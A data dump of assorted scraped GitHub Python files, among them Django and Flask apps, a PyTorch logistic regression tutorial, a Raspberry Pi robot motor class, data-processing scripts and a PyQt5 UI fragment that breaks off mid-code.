+{"seq_id":"16355145574","text":"# -*- coding: utf-8 -*-\n# @Time : 2022/3/14 17:05\n# @Author : kl\n# @File : test_register.py\nimport os\nimport ddt\nimport unittest\nimport requests\nfrom tools.HandleExcel import HandleExcel\nfrom tools.handle_path import testdatas_dir\nfrom tools.handle_requests import HandleRequests\nfrom tools.hand_log import HandleLog\n\nexcel_path = os.path.join(testdatas_dir, \"cases.xlsx\")\nhe = HandleExcel(excel_path,\"注册\")\ndatas = he.read_all_rows_data()\nprint(datas)\nlogger = HandleLog()\n\n@ddt.ddt\nclass TestRegister(unittest.TestCase):\n name = \"注册\"\n\n @classmethod\n def setUpClass(cls) -> None:\n logger.info(f\"============= {cls.name} 接口测试开始! ==============\")\n\n @classmethod\n def tearDownClass(cls) -> None:\n logger.info(f\"============= {cls.name} 接口测试结束! ==============\")\n\n @ddt.data(*datas)\n def test_register_success(self, case):\n logger.info(f\"********* {case.get('title')} 用例 ********\")\n hr = HandleRequests()\n resp = hr.send_req(case[\"method\"], case[\"url\"], eval(case['req_data']))\n res_dict = resp.json()\n print(res_dict)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kuanglei1986/lemon","sub_path":"0308/testcases/test_register.py","file_name":"test_register.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"69929232576","text":"from flask import Flask,request,render_template\nfrom graduation_project.web_app.form import Start_Form\nfrom graduation_project.web_app.redis_queue import Queue\napp = Flask(__name__)\napp.secret_key='renjian'\nqueue=Queue()\n\n# @app.route('/')\n# def index():\n# return render_template('start_crawl.htm')\n\n\n\n@app.route('/hello')\ndef hello():\n return 'Hello World'\n\n\n# @app.route('/login', methods=['POST', 'GET'])\n# def login():\n# error = None\n# if request.method == 'POST':\n# if valid_login(request.form['username'],\n# request.form['password']):\n# return log_the_user_in(request.form['username'])\n# else:\n# error = 'Invalid username/password'\n# # the code below is executed if the request method\n# # was GET or the credentials were invalid\n# return render_template('login.html', error=error)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n form = Start_Form()\n if form.validate_on_submit():\n start_data=form.data['start_data']\n if form.data['start_data']:\n queue.push(start_data)\n return 'sucess,your data is %s'%start_data\n else:\n return 'not data'\n return render_template('start_crawl.htm', form=form)\n\n\n\n@app.route('/user/')\ndef show_user_profile(username):\n # show the user profile for that user\n return 'User %s' % username\n\n\n# @app.route('/login', methods=['GET', 'POST'])\n# def login():\n# if request.method == 'POST':\n# do_the_login()\n# else:\n# show_the_login_form()\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"cdrenjian/graduation_project","sub_path":"web_app/crawl_app.py","file_name":"crawl_app.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39896201919","text":"# Function creates a new NTE, notes segment and moves the\r\n# information in TXA 13 to field three of the NTE segment\r\n\r\ndef update_nte_3(json_in):\r\n\r\n for (s, value) in json_in.items():\r\n if s.startswith('TXA')and len(json_in[s]['13']) > 0:\r\n nte = {'1': \"\", '2': \"\", '3': json_in[s]['13'], '4': \"\"}\r\n json_in.update({'NTE.'+str(len(json_in)): nte})\r\n break\r\n\r\n return json_in\r\n","repo_name":"jsdavis02/mft_hl7_oasis_components","sub_path":"oasis_fun/update_nte_3.py","file_name":"update_nte_3.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39507015249","text":"# 213. House Robber II\n# https://leetcode.com/problems/house-robber-ii/description/\n\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n\n return max(nums[0], self.dynamic(nums[:-1]), self.dynamic(nums[1:]))\n\n\n def dynamic(self, nums):\n rob1, rob2 = 0, 0\n\n\n for n in nums:\n temp = max(rob1 + n, rob2)\n rob1 = rob2\n rob2 = temp\n\n return rob2\n \n \n \n# Example 1:\n\n# Input: nums = [2,3,2]\n# Output: 3\n# Explanation: You cannot rob house 1 (money = 2) and then rob house 3 (money = 2), because they are adjacent houses.\n \n \n# Example 2:\n\n# Input: nums = [1,2,3,1]\n# Output: 4\n# Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n# Total amount you can rob = 1 + 3 = 4.\n","repo_name":"anoopanni/leetcode","sub_path":"HourseRobber2.py","file_name":"HourseRobber2.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"21202350823","text":"# Code for whole NA domain using Kao's dataset\nimport os \nimport netCDF4 as nc\nimport numpy as np\nfrom itertools import cycle\nfrom pprint import pprint\nfrom time import process_time \n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ninput_path= '/home/7xw/data/GWSP3_DayMet/2014NA'\nfile_name = '/home/7xw/data/GWSP3_DayMet/2014NA/clmforc.Daymet4.1km.FSDS.2014-01.nc'\n\nvis =0 \ndebug = 1\nsave_memory = 1\n\nnumber_of_subdomains = 4200 # 4200 for 700 Summit nodes\ni_timesteps = 248 # 248 for 31 days\n\nstart = process_time()\n# Open a new NetCDF file to write the data to. For format, you can choose from\n# 'NETCDF3_CLASSIC', 'NETCDF3_64BIT', 'NETCDF4_CLASSIC', and 'NETCDF4'\nr_nc_fid = nc.Dataset(file_name, 'r', format='NETCDF4')\n\ntotal_rows = r_nc_fid.dimensions['x'].size\ntotal_cols = r_nc_fid.dimensions['y'].size\ntotal_timesteps = r_nc_fid.dimensions['time'].size\n\n\nFSDS = r_nc_fid['FSDS'][0:i_timesteps, :, :] # read (timestep, y, x) format\n#FSDS = FSDS.transpose(0,2,1) # change to (time, x,y) format\nend = process_time()\nprint(\"Reading FSDS takes {}\".format(end-start))\n\nif vis :\n x = np.linspace(1, total_rows, total_rows, dtype=int)\n y = np.linspace(1, total_cols, total_cols, dtype=int)\n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n X,Y = np.meshgrid(x, y)\n ax.view_init(90,0)\n ax.plot_wireframe(Y, X, FSDS[0])\n plt.show()\n\n# Create a global ID for ALL the gridcells\n\nstart = process_time()\ntotal_gridcells = total_rows * total_cols\ngrid_ids = np.linspace(0, total_gridcells-1, total_gridcells, dtype=int)\n\n# create a mask for land grid_ids (1)\nmask = FSDS[0] # FSDS is in (time, Y, X) format\nmask = np.where(~np.isnan(mask), 1, 0)\n\n# create an flattened list of land gridID and reduce the size of gridIDs array\ngrid_ids = grid_ids.reshape(total_cols,total_rows)\ngrid_ids = np.multiply(mask,grid_ids)\ngrid_ids = grid_ids[grid_ids != 0]\n\nend = process_time()\nprint(\"Generate Grid_id takes {}\".format(end-start))\n\n# use the size of land gridcells to resize the FSDS matrix\nstart = process_time()\nlandcells = len(grid_ids)\nif debug:\n print('number of land cells is '+str(landcells))\n \nFSDS=FSDS[~np.isnan(FSDS)]\nFSDS = np.reshape(FSDS,(i_timesteps,landcells))\n\nend = process_time()\nprint(\"Creating dense FSDS takes {}\".format(end-start))\n\n\nstart = process_time()\n# partition landcells into subdomains\n# number_of_subdomains = 4200 # 4200 for 700 Summit nodes\n\n# cyclic (round-robin) partition\ndomains = [[] for _ in range(number_of_subdomains)]\nfor element, domain in zip(grid_ids, cycle(domains)):\n domain.append(element)\n\n#for i in range(number_of_subdomains):\n# # convert local gridID-list into array\n# grid_id_arr[i] = np.array(domains[i]) \ngrid_id_domains = domains.copy()\n\n# partition the FSDS over landcells\n# landcell_idx is alse the column_idx of FSDS\nlandcell_idx = np.linspace(0, landcells-1, landcells, dtype=int)\n\ndomains = [[] for _ in range(number_of_subdomains)]\nfor element, domain in zip(landcell_idx, cycle(domains)):\n domain.append(element)\n \n# save the boundaries of each subdomain (for array_split)\nsize_of_subdomains = [ len(domain) for domain in domains]\n\n# partitioned landcells_idx in subdomains \narranged_grid_idx = np.concatenate(domains).ravel()\nprint(arranged_grid_idx)\n# find the original index of landcells for column swap\nnp.sort(arranged_grid_idx)\ngrid_swap_idx = (np.argsort(arranged_grid_idx))\n\n# create swap index and arrange FSDS\nidx = np.empty_like(grid_swap_idx)\nidx[grid_swap_idx] = np.arange(len(grid_swap_idx))\nFSDS = FSDS[:,idx]\n\nend = process_time()\nprint(\"Partitioning FSDS/GridID takes {}\".format(end-start))\n","repo_name":"daliwang/DaymetDataUtilities","sub_path":"partition_3rd_swap.py","file_name":"partition_3rd_swap.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"28606680639","text":"from django.contrib.auth import login, logout\nfrom django.contrib.auth.views import LoginView\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView\nfrom django.views.generic.base import View\nfrom django.core.paginator import Paginator\n\nfrom django.contrib import messages\nfrom transliterate import slugify\n\nfrom .models import *\nfrom .forms import *\n\ndef index(request):\n if request.user.is_authenticated:\n return redirect(f'/rec_article/')\n return redirect(f'/all_articles/')\n\n\nclass AllArticles(ListView):\n # Представление главной страницы со всеми статьями\n paginate_by = 10\n model = Article\n template_name = 'Blog/index.html'\n context_object_name = 'articles'\n queryset = Article.objects.all().order_by('-pk')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Главная страница'\n context['head'] = 'Все статьи'\n\n return context\n\n\nclass RecArticle(View):\n # Представление главной страницы с рекомендациями\n def get(self, request):\n # Поиск рекомендованных статей\n subscribe_article = MarkedArticle.objects.filter(subscribe_to_post=True, showing_to_user=request.user)\n recommended_articles = Article.objects.none()\n\n if subscribe_article.exists():\n for i in subscribe_article:\n recommended_articles = recommended_articles.union(\n Article.objects.filter(author=i.article.author, time_create__gte=i.time_subscribe_to_post)\n )\n recommended_articles = recommended_articles.order_by('-time_create')\n head = 'Ваши рекомендации'\n paginator = Paginator(recommended_articles, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n else:\n head = 'Вы не подписались не на одну статью'\n page_obj = None\n\n context = {\n 'page_obj': page_obj,\n 'title': 'Рекомендации',\n 'head': head\n }\n return render(request, 'Blog/index.html', context=context)\n\n\nclass ReadArticle(View):\n # Представление прочитанных статей на главной странице\n\n def get(self, request):\n # Поиск прочитанных статей\n articles_read = ReadTheArticle.objects.filter(showing_to_user=self.request.user)\n articles_read_user = Article.objects.none()\n if articles_read.exists():\n for i in articles_read:\n articles_read_user = articles_read_user.union(Article.objects.filter(pk=i.article.pk))\n\n if articles_read_user.exists():\n head = 'Прочитанные статьи'\n paginator = Paginator(articles_read_user, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n else:\n head = 'Вы не прочитали не одной статьи'\n page_obj = None\n\n context = {\n 'page_obj': page_obj,\n 'title': 'Прочитанные статьи',\n 'head': head\n }\n return render(request, 'Blog/index.html', context=context)\n\n\nclass Author(ListView):\n # Представление страницы пользователей с количествами постов\n model = CountArticleUser\n template_name = 'Blog/authors.html'\n context_object_name = 'count_article_user'\n queryset = CountArticleUser.objects.all().order_by('author')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['sort_form'] = SortAutorForm()\n context['title'] = 'Пользователи'\n return context\n\n\nclass SortListUser(View):\n # Представление отсортированной страницы пользователей(по количеству постов, по авторам)\n def post(self, request):\n sort_form = SortAutorForm(request.POST)\n count_article_user = CountArticleUser.objects.all()\n if sort_form.is_valid():\n needed_sort = sort_form.cleaned_data.get(\"sort_autor_form\")\n if needed_sort == \"количество\":\n count_article_user = count_article_user.order_by(\"-count\")\n elif needed_sort == \"автор\":\n count_article_user = count_article_user.order_by(\"author\")\n context = {\n 'sort_form': sort_form,\n 'count_article_user': count_article_user,\n 'title': 'Пользователи'\n }\n return render(request, 'Blog/authors.html', context=context)\n\n\nclass ShowArticleAuthor(DetailView):\n # Представление страницы пользователя с написанными им статьями\n model = User\n template_name = 'Blog/author_detail.html'\n context_object_name = 'user'\n pk_url_kwarg = 'user_id'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = f'Посты пользователя {self.request.user}'\n context['article'] = Article.objects.filter(author=kwargs['object']).order_by('-time_create')\n\n return context\n\n\nclass ShowArticle(DetailView):\n # Представление для конкретной статьи\n model = Article\n template_name = 'Blog/article_detail.html'\n context_object_name = 'article'\n slug_url_kwarg = 'article_slug'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = f'Пост {context[\"article\"]}'\n print(context[\"article\"].slug)\n a = Article.objects.get(slug=context[\"article\"].slug)\n try:\n context['marked_article'] = MarkedArticle.objects.get(showing_to_user=self.request.user, article=a)\n except MarkedArticle.DoesNotExist:\n context['marked_article'] = None\n\n try:\n context['read_the_article'] = ReadTheArticle.objects.get(showing_to_user=self.request.user, article=a)\n except ReadTheArticle.DoesNotExist:\n context['read_the_article'] = None\n\n return context\n\n\ndef sub_from_post(request, article_slug):\n subscribe_to_post = MarkedArticle.objects.create(\n article=Article.objects.get(slug=article_slug), showing_to_user=request.user, subscribe_to_post=True\n )\n\n return redirect(f'/article/{article_slug}/')\n\n\ndef unsub_from_post(request, article_slug):\n a = Article.objects.get(slug=article_slug)\n unsub = MarkedArticle.objects.get(showing_to_user=request.user, article=a)\n unsub.delete()\n\n return redirect(f'/article/{article_slug}/')\n\n\ndef mark_as_read(request, article_slug):\n marked_article = ReadTheArticle.objects.create(\n article=Article.objects.get(slug=article_slug), showing_to_user=request.user\n )\n\n return redirect(f'/article/{article_slug}/')\n\n\ndef remove_the_mark(request, article_slug):\n a = Article.objects.get(slug=article_slug)\n remove_mark = ReadTheArticle.objects.get(showing_to_user=request.user, article=a)\n remove_mark.delete()\n\n return redirect(f'/article/{article_slug}/')\n\n\nclass AddArticlePage(View):\n def get(self, request):\n form = AddArticleForm(request.POST)\n context = {\n 'title': 'Добавление статьи',\n 'form': form\n }\n return render(request, 'Blog/add_article.html', context)\n\n\nclass AddArticle(View):\n def post(self, request):\n form = AddArticleForm(request.POST)\n if form.is_valid():\n add_article = form.save(commit=False)\n add_article.title = form.cleaned_data['title']\n add_article.content = form.cleaned_data['content']\n add_article.author = request.user\n add_article.slug = slugify(form.cleaned_data['title'])\n add_article.save()\n\n cau = CountArticleUser.objects.get(author=request.user)\n cau.count += 1\n cau.save()\n\n messages.add_message(request, messages.INFO, \"Статья успешно добавлена!\")\n return HttpResponseRedirect('/')\n\n\nclass RegisterUser(CreateView):\n form_class = RegisterUserForm\n template_name = 'Blog/register.html'\n success_url = reverse_lazy('authors')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = \"Регистрация\"\n messages.add_message(self.request, messages.INFO, \"Статья успешно добавлена!\")\n\n return context\n\n def form_valid(self, form):\n user = form.save()\n login(self.request, user)\n CountArticleUser.objects.create(\n author=self.request.user, count=0\n )\n return redirect('index')\n\n\nclass LoginUser(LoginView):\n form_class = LoginUserForm\n template_name = 'Blog/login.html'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Авторизация'\n return context\n\n def get_success_url(self):\n return reverse_lazy('index')\n\n\ndef logout_user(request):\n logout(request)\n print('hello')\n return redirect('login')\n\n\n","repo_name":"TriplG/WB-Tech","sub_path":"Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6125463030","text":"# 57-WAP to swap the values of two variable that are defined as global variables\nfn,sn=5,18\ndef swap():\n global fn,sn\n temp=fn\n fn=sn\n sn=temp\n print(\"After Swapping:\\n First Num={} and Second Num={}\".format(fn,sn))\n\nswap()","repo_name":"faiz1675/Python-Programs","sub_path":"LabFile/57-funSwap.py","file_name":"57-funSwap.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"34597808291","text":"import difflib\nimport html.parser\nimport itertools\nimport operator\nimport sys\n\nclass Parser(html.parser.HTMLParser):\n def __init__(self, *args, **kargs):\n html.parser.HTMLParser.__init__(self, *args, **kargs)\n self.avoid_collisions_nodes = []\n\n def handle_starttag(self, tag, attrs):\n attrs = \" \".join([\"=\".join([a, '\"%s\"' % b]) for a, b in attrs])\n node = (\"<%s %s>\" % (tag, attrs)) if attrs else (\"<%s>\" % tag)\n self.avoid_collisions_nodes.append(node)\n\n def handle_endtag(self, tag):\n node = \"%s>\" % tag\n self.avoid_collisions_nodes.append(node)\n\n def handle_data(self, data):\n if self.avoid_collisions_nodes:\n if not self.avoid_collisions_nodes[-1].startswith(\"<\"):\n self.avoid_collisions_nodes[-1] += data\n return\n self.avoid_collisions_nodes.append(data)\n\n def handle_entityref(self, name):\n self.handle_data(\"&%s;\" % name)\n\n def handle_charref(self, name):\n self.handle_data(\"&%s;\" % name)\n\ndef character_data(node):\n return not node.startswith(\"<\")\n\ndef content(line):\n return line[2:]\n\ndef out(text):\n # http://stackoverflow.com/questions/4601912\n sys.stdout.flush()\n sys.stdout.buffer.write(text.encode(\"utf-8\"))\n\ndef lines(old, new):\n delta = difflib.ndiff(old, new)\n\n print(\"\")\n print(\"\")\n print(\"\")\n first = operator.itemgetter(0)\n for item, group in itertools.groupby(delta, first):\n if item == \"?\":\n continue\n\n out(\"\" % item)\n group = [content(line) for line in group]\n cdata = any(map(character_data, group))\n\n if cdata:\n if item == \"+\":\n out(\"\")\n elif item == \"-\":\n out(\"\")\n\n if cdata or (item != \"-\"):\n for line in group:\n out(line)\n\n if cdata:\n if item == \"+\":\n out(\"\")\n elif item == \"-\":\n out(\"\")\n\ndef files(a, b):\n parser_a = Parser()\n with open(a, \"rb\") as f:\n for line in f:\n try:\n line = line.decode(\"utf-8\")\n except:\n continue\n parser_a.feed(line)\n old = parser_a.avoid_collisions_nodes\n\n parser_b = Parser()\n with open(b, \"rb\") as f:\n for line in f:\n try:\n line = line.decode(\"utf-8\")\n except:\n continue\n parser_b.feed(line)\n new = parser_b.avoid_collisions_nodes\n\n lines(old, new)\n\n","repo_name":"sbp/orinoco","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"37175753741","text":"from django.core.exceptions import ValidationError\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\nfrom .customer import Customer, validate_balance\n\n\nclass BalanceWriteOff(models.Model):\n \"\"\"\n Model related Many-To-Many with Customer model.\n Contains information about the customer balance write-offs.\n It includes:\n customer: foreign key to Customer model, show who exactly\n WAS written-off ucoins.\n related_name - incoming_balance_write_offs_set\n from_customer:\n foreign key to Customer model, show who exactly\n written-off ucoins.\n related_name - outgoing_balance_write_offs_set\n count: positive integer field, contains the count of ucoins\n for which the balance was written-off.\n comment: string integer field with max_length = 250.\n date: datetime field.\n \"\"\"\n customer = models.ForeignKey(Customer, on_delete=models.CASCADE,\n related_name=\"incoming_balance_write_offs_set\")\n from_customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True,\n help_text=\"Покупатель, который списал юкойны с баланса.\",\n related_name=\"outgoing_balance_write_offs_set\")\n # count = models.PositiveIntegerField(default=0, null=False)\n count = models.FloatField(\n default=0.0,\n validators=[\n validate_balance,\n MaxValueValidator(9999.9),\n MinValueValidator(0.0)\n ],\n null=False\n )\n header = models.CharField(max_length=100, null=False, blank=False, default=\"Списание\")\n comment = models.CharField(max_length=250, null=False, blank=True, default=\"\")\n date = models.DateTimeField(auto_now_add=True)\n\n type = \"write_off\"\n\n class Meta:\n verbose_name = \"Списание баланса\"\n verbose_name_plural = \"Списания балансов\"\n ordering = [\"-date\"]\n\n def __str__(self):\n return f\"Списание со счёта пользователя {self.customer.name()} на {self.count}\"\n\n def customer_name(self):\n return self.customer.name()\n\n def from_customer_name(self):\n if self.from_customer:\n return self.from_customer.name()\n return None\n\n def save(self, *args, **kwargs):\n try:\n self.customer.decrease_balance(self.count)\n except ValidationError as err:\n raise err\n else:\n super(BalanceWriteOff, self).save(*args, **kwargs)\n","repo_name":"DevCrusader/UStoreAPI","sub_path":"project/customer/models/balance_write_off.py","file_name":"balance_write_off.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"30643734343","text":"import RPi.GPIO as GPIO\n\nclass Motor:\n def __init__(self, en, in1, in2):\n self.EN = en\n self.IN1 = in1\n self.IN2 = in2\n\n GPIO.setup([self.EN, self.IN1, self.IN2], GPIO.OUT, initial=GPIO.LOW)\n\n def stop(self):\n GPIO.output([self.EN, self.IN1, self.IN2], GPIO.LOW)\n\n def forward(self):\n GPIO.output([self.EN, self.IN1], GPIO.HIGH)\n GPIO.output(self.IN2, GPIO.LOW)\n\n def backward(self):\n GPIO.output([self.EN, self.IN2], GPIO.HIGH)\n GPIO.output(self.IN1, GPIO.LOW)\n\nclass Robot:\n def __init__(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n\n self.left_motor = Motor(32, 38, 40)\n self.right_motor = Motor(33, 37, 35)\n\n self.steering = \"fw\"\n self.direction = \"stopped\"\n\n def __del__(self):\n self.stop()\n try:\n GPIO.cleanup()\n except Exception as e:\n print(\"Cleanup failed\")\n print(e)\n\n def move(self):\n if self.direction == \"fw\":\n if self.steering == \"fw\":\n self.left_motor.forward()\n self.right_motor.forward()\n elif self.steering == \"left\":\n self.right_motor.forward()\n self.left_motor.stop()\n else:\n self.left_motor.forward()\n self.right_motor.stop()\n elif self.direction == \"bw\":\n if self.steering == \"fw\":\n self.left_motor.backward()\n self.right_motor.backward()\n elif self.steering == \"left\":\n self.left_motor.backward()\n self.right_motor.stop()\n else:\n self.right_motor.backward()\n self.left_motor.stop()\n else:\n self.left_motor.stop()\n self.right_motor.stop()\n\n def no_steering(self):\n self.steering = \"fw\"\n self.move()\n\n def stop(self):\n self.direction = \"stopped\"\n self.move()\n\n def forward(self):\n self.direction = \"fw\"\n self.move()\n\n def backward(self):\n self.direction = \"bw\"\n self.move()\n\n def right(self):\n self.steering = \"right\"\n self.move()\n\n def left(self):\n self.steering = \"left\"\n self.move()\n","repo_name":"Jostyck9/remote-robot-surveillance","sub_path":"robot/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"28208022805","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\nresultfile = sys.argv[1]\n\nx = []\ny = []\n\ndef get_garph():\n fp = open(resultfile,'r')\n data = fp.readlines()\n\n for i in data:\n tempx = (i.split())[0]\n tempy = (i.split())[1]\n x.append(tempx)\n y.append(int(tempy))\n\n fp.close()\n plt.ylim(1, 100)\n plt.title(\"Exam Score-2020\", fontsize=24)\n plt.xlabel(\"Name\", fontsize=14)\n plt.ylabel(\"Score\", fontsize=14)\n plt.plot(x, y)\n plt.show()\n return\n\nif __name__ == '__main__':\n get_garph()\n","repo_name":"allenshi86/Python","sub_path":"Graphical_data/Graphical_data_matplotlib.py","file_name":"Graphical_data_matplotlib.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31695596875","text":"'''\nDescription: 逻辑回归\n视频:https://www.bilibili.com/video/BV1Y7411d7Ys?p=6\n博客: https://blog.csdn.net/bit452/article/details/109680909\nAuthor: HCQ\nCompany(School): UCAS\nEmail: 1756260160@qq.com\nDate: 2020-12-05 16:53:13\nLastEditTime: 2020-12-05 17:12:56\nFilePath: /pytorch/PyTorch深度学习实践/06逻辑回归.py\n'''\n\n\nimport torch\n# import torch.nn.functional as F\n \n# 1 prepare dataset\nx_data = torch.Tensor([[1.0], [2.0], [3.0]])\ny_data = torch.Tensor([[0], [0], [1]]) # =============================[0], [0], [1]]=========================\n \n# 2 design model using class\nclass LogisticRegressionModel(torch.nn.Module):\n def __init__(self):\n super(LogisticRegressionModel, self).__init__()\n self.linear = torch.nn.Linear(1,1)\n \n def forward(self, x):\n # y_pred = F.sigmoid(self.linear(x))\n y_pred = torch.sigmoid(self.linear(x)) # ========================sigmoid=============================\n return y_pred\nmodel = LogisticRegressionModel()\n \n# 3 construct loss and optimizer\n# 默认情况下,loss会基于element平均,如果size_average=False的话,loss会被累加。\ncriterion = torch.nn.BCELoss(size_average = False) # ==================BCELoss===========================\noptimizer = torch.optim.SGD(model.parameters(), lr = 0.01)\n \n# 4 training cycle forward, backward, update\nfor epoch in range(1000):\n y_pred = model(x_data)\n loss = criterion(y_pred, y_data)\n print(epoch, loss.item())\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \nprint('w = ', model.linear.weight.item())\nprint('b = ', model.linear.bias.item())\n \nx_test = torch.Tensor([[4.0]])\ny_test = model(x_test)\nprint('y_pred = ', y_test.data)\n\n\n\n# 可视化\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nx = np.linspace(0, 10, 200)\nx_t = torch.Tensor(x).view((200, 1))\ny_t = model(x_t) # 使用训练好的模型\ny = y_t.data.numpy()\nplt.plot(x, y)\nplt.plot([0, 10], [0.5, 0.5], c='r')\nplt.xlabel('Hours')\nplt.ylabel('Probability of Pass')\nplt.grid()\nplt.show()\n\n\n\n","repo_name":"HuangCongQing/pytorch","sub_path":"PyTorch深度学习实践/06逻辑回归.py","file_name":"06逻辑回归.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"79"}
+{"seq_id":"42384295901","text":"def decrypt(library, message):\r\n \"\"\"\r\n return String for parameters\r\n library a list of Strings\r\n and message a string\r\n \"\"\"\r\n\r\n # Make lists of keys and values\r\n keys = []\r\n values = []\r\n for entry in library:\r\n entry = entry.split()\r\n keys.append(entry[1])\r\n values.append(entry[0])\r\n\r\n # Decode the message\r\n decoded = ''\r\n message = message.split()\r\n for m in range(len(message)):\r\n for k in range(len(keys)):\r\n if message[m] == keys[k]:\r\n decoded += values[k]\r\n if message[m] not in keys:\r\n decoded += '?'\r\n return decoded","repo_name":"Lihong062/CS101","sub_path":"APTs/APT-4/MorseLikeCode.py","file_name":"MorseLikeCode.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27713867039","text":"import csv\nclass Product:\n\n def __init__(self, product_id, category):\n self.product_id = product_id\n self.category = category\n\n if any(v is None for v in [self.product_id, self.category]):\n raise ValueError('Arguments missing')\n\n def __str__(self):\n return \"Product: {}, Category: {}\".format(\n self.product_id,\n self.category\n )\n\n\ndef load_catalog_from_file(filename):\n catalog = {}\n with open(filename) as f:\n csvReader = csv.reader(f)\n for line in csvReader:\n product = Product(product_id=line[0], category=line[5])\n catalog[product.product_id] = product.category\n return catalog\n","repo_name":"AneliyaPPetkova/Programming","sub_path":"Python/7.SupermarketsDataAnalysis/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"73289684736","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom img import img\nimport sys\nimport pytube as pt\nimport os\nimport moviepy.editor as mp\nimport subprocess\n\n\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(400, 286)\n Dialog.setMinimumSize(QtCore.QSize(400, 286))\n Dialog.setMaximumSize(QtCore.QSize(400, 286))\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(0, -8, 401, 301))\n self.label.setStyleSheet(\"background-color: rgb(66, 66, 66);\")\n self.label.setText(\"\")\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(Dialog)\n self.label_2.setGeometry(QtCore.QRect(0, 0, 401, 61))\n self.label_2.setStyleSheet(\"image: url(:/img/Settings2_00000.png);\")\n self.label_2.setText(\"\")\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(Dialog)\n self.label_3.setGeometry(QtCore.QRect(10, 90, 141, 61))\n self.label_3.setStyleSheet(\"image: url(:/img/AdMusic_00000.png);\")\n self.label_3.setText(\"\")\n self.label_3.setObjectName(\"label_3\")\n self.label_4 = QtWidgets.QLabel(Dialog)\n self.label_4.setGeometry(QtCore.QRect(0, -40, 441, 371))\n self.label_4.setStyleSheet(\"image: url(:/img/settingsFundo_00000.png);\")\n self.label_4.setText(\"\")\n self.label_4.setObjectName(\"label_4\")\n self.lineEdit = QtWidgets.QLineEdit(Dialog)\n self.lineEdit.setGeometry(QtCore.QRect(140, 110, 211, 20))\n self.lineEdit.setStyleSheet(\"QLineEdit { \\n\"\n\" border-color: rgb(85, 0, 255);\\n\"\n\" background-color: rgb(222, 222, 222);\\n\"\n\" color: rgb(0, 0, 0);\\n\"\n\"}\\n\"\n\"QLineEdit:hover {\\n\"\n\" border:2px solid rgb(45, 45, 45);\\n\"\n\"}\\n\"\n\"QLineEdit:focus {\\n\"\n\" border:2px solid rgb(0, 0, 0);\\n\"\n\"\\n\"\n\"}\\n\"\n\"\")\n 